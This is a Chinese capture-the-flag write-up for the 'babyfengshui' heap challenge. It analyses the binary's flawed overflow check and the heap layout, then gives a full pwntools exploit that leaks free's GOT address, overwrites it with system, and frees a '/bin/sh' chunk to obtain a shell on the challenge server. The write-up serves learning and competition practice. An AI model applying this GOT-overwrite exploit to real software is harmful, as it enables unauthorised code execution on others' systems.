0x1 前言

备战校赛，巩固heap的知识。题目没有使用高端的堆漏洞，只是考察了堆分配时的规则，算是一道比较基础的堆溢出题目。

0x2 题目分析

首先打开文件运行一下，一道典型的菜单题目，我们可以输入，删除，修改，和展示。拖入IDA，分析一下，整道题目的具体逻辑。首先进入到各个操作中看看操作的具体流程。

• 添加操作：首先询问一个大小，然后以这个大小申请了堆A。之后又立即申请了大小为0x80的堆B，在其中最开始的字节上放上了堆A的起始地址。之后会让你输入text的大小（会有堆溢出的检测），然后输内容，操作结束。具体流程如下：
  首先申请0x20（输入大小0x20）的堆块：

紧接着会申请一个0x80的堆：

• 删除：输入一个数字，代表堆在构建中的位置，直接删除（没有给UAF的机会）。其实仔细观察IDA，就会发现，在动态申请的堆块上方存在一个内存空间，很像是一个指针数组，他会指向0x80堆块的起始位置。位置在0x0804B080，我们之后会打印出来分析的。
• 展示：顾名思义，输入堆号，如果堆存在，我们就打印姓名与text的内容。
• 修改，提供修改text内容的功能。

好的，分析完各各模块基本功能后，我们开始具体的观察一下堆内的变化，找一找我们可以利用的地方。
首先是两个heap的地址：

x/32gx 0x804b080 //pre  heap指针数组
x/32gx 0x804c000 //open heap动态配的heap

我们首先创建一个text具体参数如下：

1.size :0x40---64
  name :AAAA
  text length:0x20---32
  text :BBBB

heap:0x804c008
?? if:  text length+heap >= pre-4
        0x20+0x804c008 >= 0x804c050-0x4

此时堆内的情况就十分的清楚了：

我们发现name其实是不占用我们申请的text空间的，他是被存放在0x80的堆中的。而再当堆成功创建后，base也记录了这个堆开始的地方。相关数据结构如下：（注意，第一个堆的编号为0）

有点抽象，可以自己GDB试一下。而整个程序判断溢出的方式也很简单：
起始地址1+input（text size）< 起始地址2-4
如果不满足，直接报错，结束程序。
这里我们继续在创建一个堆，验证一下我们的理解是否正确：

2.size:0x20-->32
  name:c1234
  text length:0x10
  text:5678

heap:0x0804c0d8

完全正确，这时我试试free的功能，我们释放掉了0号块。在观察内存空间，按照堆的分配原理，他将0x20与0x80释放并且合成了一个大小为0xA0的空闲堆块。咦？那我们是不是可以通过再次申请大小正好可以放下0xA0的一个堆，此时0x80就没有了空间，他只能像TOP再次申请一段空间，此时两个块就会被分开。这时我们再看，溢出判断：text length+heap >= pre（会指向块的最末端）-4，我们就完成了堆的溢出。来一张图理解一下：

0x3 漏洞测试

既然有了想法，按我们就开始动手试一试，看看我们能不能完成这个溢出。

1. 申请两个块，第二个块的目的就是起到一个阻挡的目的。
   
2. 释放0号块，这里解释一下这张图片，我写错了，又不想改，我们释放掉了0号块，但是图里的那个时1号块，所以还在。可能有小伙伴问为啥不重新截一张呢？emmmmm，对不起，我太懒了。
   
3. 重新申请一个块，text size==0x80 + first text size
   

思路：

1.size 0x20
  name 
  text length
  text 

heap:
size:0x20+0x80

2.size 0x20
  name 
  text length
  text 

heap:
size:0x20+0x80

heap now:
      1  text heap size:0x20
    1  heap ptr size:0x80
      2  text heap size:0x20
    2  heap ptr size:0x80
      TOP

3.free 1heap

4.size:0xA0 
  name 
  text length
  text 
heap:
size:0xA0+0x80

heap now:
    1 text heap size:0xA0
    2  text heap size:0x20
    2  heap ptr size:0x80
        1  heap ptr size:0x80
        TOP

仔细看，这时被heap就被分开了。ps：这张图与上两张图并不匹配，因为，我遇到了一个小问题。
小问题：
第一次我构造的时0x20+0x80=0xA0，虽然构造的时候使用的时0xA0，但是并没有成功。

emmm，可能是我有问题，但是我确实没找到合适的原因。

0x4 构建exp思路

既然我们已经发现了漏洞，现在就差exp了。
emmmm，呀程序没有后门，那我们必须要借助got表的知识了，我们需要泄露出一个函数的地址，然后通过这个函数泄露system的地址，最终完成调用。看看，嗯free函数就比较合适，首先我们要知道，got表必须要被执行过一次才可以被加载为libc中的地址，而我们在溢出过程中是需要调用free函数的。
我们泄露地址其实就是got表里面的地址，然后我们可以直接对got表进行修改，将free的地址换为system的地址，这是我们就完成了偷梁换柱。这时我们只需要构建一个text="/bin/sh"就可以了，然后调用free，完成！相当于调用了system(text),text=/bin/sh

0x5 exp

自己写exp还是不太行，参考了一下，最后写成这个样子了：

#coding:utf8  
from pwn import *  
from LibcSearcher import *  
      
#sh = process('./babyfengshui1')  
sh = remote('220.249.52.133',30315)  
elf = ELF('./babyfengshui')  
#libc = elf.libc  
      
def create(size,name,textLen,content):  
    sh.sendlineafter('Action:','0')  
    sh.sendlineafter('size of description:',str(size))  
    sh.sendlineafter('name:',name)  
    sh.sendlineafter('text length:',str(textLen))  
    sh.sendafter('text:',content)  
      
def delete(index):  
    sh.sendlineafter('Action:','1')  
    sh.sendlineafter('index:',str(index))  
      
      
def show(index):  
    sh.sendlineafter('Action:','2')  
    sh.sendlineafter('index:',str(index))  
      
      
def edit(index,textLen,content):  
    sh.sendlineafter('Action:','3')  
    sh.sendlineafter('index:',str(index))  
    sh.sendlineafter('text length:',str(textLen))  
    sh.sendafter('text:',content)  
create(0x80,'heap0',0x80,'a'*0x80)  
create(0x80,'heap1',0x80,'b'*0x80)  
#存放/bin/sh字符串  
create(0x10,'heap2',0x7,'/bin/sh')   
delete(0)    
create(0x100,'heap3',0x19C,'c'*0x198 + p32(elf.got['free']))   
show(1)     
sh.recvuntil('description: ')  
free_addr = u32(sh.recv(4))  
libc = LibcSearcher('free',free_addr)  
libc_base = free_addr - libc.dump('free')  
system_addr = libc_base + libc.dump('system')       
#修改free的got表地址为system的地址  
edit(1,4,p32(system_addr))  
#getshell，相当于system(heap[2])  
delete(2)  
sh.interactive()